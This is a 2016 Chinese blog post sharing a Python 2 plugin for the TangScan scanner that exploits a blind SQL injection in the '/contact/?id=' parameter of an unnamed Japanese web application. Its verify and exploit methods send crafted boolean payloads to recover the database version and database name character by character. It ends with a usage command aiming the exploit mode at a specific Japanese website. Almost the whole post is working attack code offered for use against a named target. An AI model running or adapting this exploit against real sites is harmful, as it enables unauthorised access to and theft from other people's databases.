
TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’

2016年03月31日 16:06 学习笔记 暂无评论 共3862字 (阅读2,640 views次)

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

#! /usr/bin/env python
# -*- coding: utf-8 -*-
 
import string 
import time
from thirdparty import requests
from modules.exploit import TSExploit
 
class TangScan(TSExploit):
    """Boolean-based blind SQL injection check for the ``/contact/?id=`` endpoint.

    ``verify`` and ``exploit`` drive the same oracle: each probe URL carries a
    SQL condition that is false only for the value currently being guessed,
    and the response body is searched for the marker ``name="" method``.  The
    outcome is never returned; it is written to ``self.result``.  Python 2
    only (``print`` statements, ``except Exception, e``).
    """

    def __init__(self):
        # Plugin metadata, the single ``url`` option and the result record are
        # registered with the TSExploit base class; the framework reads them.
        super(self.__class__, self).__init__()
        self.info = {
            "name": "Jp SQL injection",
            "product": "",
            "product_version": "",
            "desc": """
            日本某程序SQL漏洞检测插件
            """,
            "license": self.license.TS,
            "author": ["虾米 https://woj.app"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2016-0187803"},
            ],
            "type": self.type.injection,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({ 
            "status": False,
            "data": { 
 
            },
            "description": "",
            "error": ""
        })
 
 
    def verify(self): 
        """Detect the injection by recovering ``version()`` one character at a time.

        Result record: ``status`` True and a description holding the recovered
        string on success; ``status`` False when no length is found, a probe
        gets a non-200 reply, or the recovered string lacks ``"5."``;
        ``error`` holds the exception text when a request raises.  Every probe
        URL is also printed to stdout.
        """
        user = "" 
        user_length = 0 
        url = ("{domain}/contact/?id=".format(domain=self.option.url)) 
        # Browser-like request headers; sent unchanged on every probe.
        headers = { 
            "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0", 
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
			"Accept-Encoding": "gzip, deflate"
        } 
        # Candidate characters tried at each position: symbols and digits
        # first, then a-z (``exploit`` uses the opposite order).
        payloads = ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']+ list(string.ascii_lowercase) 
        # Probe templates.  ``l`` is false exactly when length(version()) == x;
        # ``s`` is false exactly when the x-th character's code equals the guess.
        l = "1' AND (length(version())-%s)!=0 AND 'sbsb'='sbsb" 
        s = "1' AND ORD(MID((IFNULL(CAST(version() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb" 
 
        # Step 1: find the length (1..29).  The marker in the body is taken to
        # mean the injected condition evaluated false, i.e. x is the length.
        for x in range(1, 30): 
            tmp = l % str(x) 
            exps_url = url  +  tmp
 
            try: 
                print exps_url
                # verify=False: TLS certificate checks are disabled for every probe.
                response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                time.sleep(0.3)# throttle the request rate 
                if response.status_code != 200: 
                    self.result.status = False 
                    return 
            except Exception,e: 
                self.result.error = str(e) 
                return 
            if response.content.find("name=\"\" method") != -1: 
                user_length = x 
                break 
 
        if user_length == 0: 
            self.result.status = False 
            return 
 
        # Step 2: recover each position by trying every candidate.  A position
        # for which no candidate matches is silently skipped, so ``user`` can be
        # shorter than ``user_length``.
        for x in range(1, user_length+1): 
 
            for payload in payloads: 
                a = s % (str(x), str(ord(payload))) 
                exps_url = url  +  a 
 
                try: 
                    print exps_url, user_length
                    response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                    time.sleep(0.3)# throttle the request rate 
                    if response.status_code != 200: 
                        self.result.status = False 
                        return 
                except Exception,e: 
                    self.result.error = str(e) 
                    return 
                if response.content.find("name=\"\" method") != -1: 
                    user = user + payload 
                    break 
 
        # Sanity check on the recovered string (presumably a MySQL 5.x version
        # string is expected); anything else is treated as a false positive.
        if user.find("5.")==-1:# reduce the false-positive rate 
            self.result.status = False 
            return 
        self.result.status = True 
        self.result.description = "目标 {url} 存在SQL注入漏洞, 获取到的当前数据库版本为:{db_user}".format( 
            url=self.option.url, 
            db_user=user 
        )
 
 
    def exploit(self):
        """Recover ``database()`` with the same oracle and loop as ``verify``.

        Differences from ``verify``: the length search runs to 99, candidates
        are tried a-z first, nothing is printed, and there is no sanity check
        on the recovered string, so ``status`` becomes True whenever a length
        was found.  Outcome is written to ``self.result``.
        """
        user = "" 
        user_length = 0 
        url = ("{domain}/contact/?id=".format(domain=self.option.url)) 
        headers = { 
            "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0", 
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
			"Accept-Encoding": "gzip, deflate"
        } 
        payloads = list(string.ascii_lowercase)+ ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'] 
        # Same templates as ``verify`` with database() in place of version().
        l = "1' AND (length(database())-%s)!=0 AND 'sbsb'='sbsb" 
        s = "1' AND ORD(MID((IFNULL(CAST(database() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb" 
 
        # Step 1: length search, 1..99.
        for x in range(1, 100): 
            tmp = l % str(x) 
            exps_url = url  +  tmp
 
            try: 
                # verify=False: TLS certificate checks are disabled for every probe.
                response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                time.sleep(0.3)# throttle the request rate 
                if response.status_code != 200: 
                    self.result.status = False 
                    return 
            except Exception,e: 
                self.result.error = str(e) 
                return 
            if response.content.find("name=\"\" method") != -1: 
                user_length = x 
                break 
 
        if user_length == 0: 
            self.result.status = False 
            return 
 
        # Step 2: per-position recovery; unmatched positions are skipped, as in
        # ``verify``.
        for x in range(1, user_length+1): 
 
            for payload in payloads: 
                a = s % (str(x), str(ord(payload))) 
                exps_url = url  +  a 
 
                try: 
                    response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                    time.sleep(0.3)# throttle the request rate 
                    if response.status_code != 200: 
                        self.result.status = False 
                        return 
                except Exception,e: 
                    self.result.error = str(e) 
                    return 
                if response.content.find("name=\"\" method") != -1: 
                    user = user + payload 
                    break 
 
        # NOTE(review): no post-check here, unlike ``verify``; an empty ``user``
        # still reports success.
        self.result.status = True 
        self.result.description = "目标 {url} 获取到的当前数据库名称为:{db_user}".format( 
            url=self.option.url, 
            db_user=user 
        )
 
if __name__ == '__main__':
    # Standalone entry point: hand the plugin instance to the TangScan
    # framework driver, which owns option parsing and mode selection.
    from modules.main import main
    main(TangScan())

使用命令: 789.py --url http://www.seanskitchen.jp --mode exploit
默认命令:789.py --url http://www.seanskitchen.jp --mode exploit
框架下载地址:https://github.com/WooYun/TangScan
